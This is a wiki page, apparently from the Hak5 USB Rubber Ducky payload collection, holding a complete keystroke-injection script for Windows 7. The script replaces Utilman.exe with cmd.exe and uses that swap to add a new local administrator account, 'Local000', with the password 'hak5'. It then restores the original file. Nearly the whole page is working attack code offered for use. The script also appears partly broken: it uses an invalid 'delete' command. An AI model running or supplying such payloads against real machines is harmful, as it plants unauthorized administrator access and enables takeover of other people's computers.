Payload utilman exploit

hak5darren edited this page Feb 4, 2012 · 1 revision

Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!) Duckencoder: 1.0 Target: Windows 7 Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.

REM Author: Xcellerator
REM Description: Utilman Exploiter to create a new Admin Account
REM The new account will be called "Local000".
GUI
DELAY 50
STRING cmd
MENU
STRING a
ENTER
LEFT
ENTER
DELAY 200
STRING takeown /f "%systemroot%\System32\Utilman.exe"
ENTER
DELAY 50
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
ENTER
DELAY 50
STRING cd %systemroot%\System32
ENTER
DELAY 50
STRING mkdir util
ENTER
STRING xcopy cmd.exe util\
ENTER
DELAY 50
STRING ren Utilman.exe Utilman.exe.bak
ENTER
STRING cd util
ENTER
DELAY 50
STRING ren cmd.exe Utilman.exe
ENTER
DELAY 50
STRING cd ..
ENTER
DELAY 50
STRING xcopy util/Utilman.exe \
ENTER
DELAY 50
STRING rmdir /s /q util
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI u
STRING net user Local000 /add
ENTER
DELAY 50
STRING net localgroup administrators Local000 /add
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI r
STRING cmd
ENTER
DELAY 50
STRING cd "%systemroot%\System32"
ENTER
DELAY 50
STRING delete Utilman.exe
ENTER
DELAY 50
STRING y
ENTER
DELAY 50
STRING ren Utilman.exe.bak Utilman.exe
ENTER
DELAY 50
STRING exit
ENTER
GUI
STRING cmd
MENU
STRING a
ENTER
DELAY 50
LEFT
ENTER
DELAY 200
STRING net user Local000 *
ENTER
STRING hak5
ENTER
STRING hak5
ENTER
STRING exit
ENTER
Clone this wiki locally
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Press h to open a hovercard with more details.